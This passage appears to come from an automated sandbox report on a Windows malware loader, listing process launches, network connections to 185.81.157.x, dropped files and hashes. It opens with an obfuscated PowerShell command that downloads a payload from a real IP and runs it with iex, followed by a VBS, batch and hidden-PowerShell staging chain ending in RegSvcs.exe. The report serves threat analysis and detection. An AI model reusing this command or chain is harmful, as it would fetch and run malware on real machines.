aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼
©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPO
Nï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§
ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.157.81.185.in-addr.arpa | udp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| FR | 185.81.157.183:9696 | | tcp |
| FR | 185.81.157.183:9696 | | tcp |
Files
memory/2056-5-0x00000210F1F70000-0x00000210F1F92000-memory.dmp
memory/2056-6-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
memory/2056-7-0x00000210F2010000-0x00000210F2020000-memory.dmp
memory/2056-8-0x00000210F2010000-0x00000210F2020000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5gokor4.mpf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2056-20-0x00000210F2010000-0x00000210F2020000-memory.dmp
memory/2056-23-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/4800-27-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
memory/4800-28-0x0000021DEC520000-0x0000021DEC530000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa8efa56e1e40374bbd21e0e469dceb7 |
| SHA1 | 33a592799d4898c6efdd29e132f2f76ec51dbc08 |
| SHA256 | 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf |
| SHA512 | ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096 |
C:\Users\Public\hich.ps1
| MD5 | 8469f5b76df0f510fe02b1eab0f57226 |
| SHA1 | 7ad6c79dc42aafd7b813353c8bdcb1204c376621 |
| SHA256 | a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279 |
| SHA512 | 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4 |
memory/4800-40-0x0000021DEE6A0000-0x0000021DEE6D4000-memory.dmp
memory/3484-42-0x0000000000400000-0x0000000000416000-memory.dmp
memory/4800-41-0x0000021DEC520000-0x0000021DEC530000-memory.dmp
memory/4800-44-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp
memory/3484-45-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/3484-46-0x0000000003200000-0x0000000003210000-memory.dmp
memory/3484-47-0x0000000005FC0000-0x0000000006564000-memory.dmp
memory/3484-48-0x0000000005C00000-0x0000000005C92000-memory.dmp
memory/3484-49-0x0000000005BF0000-0x0000000005BFA000-memory.dmp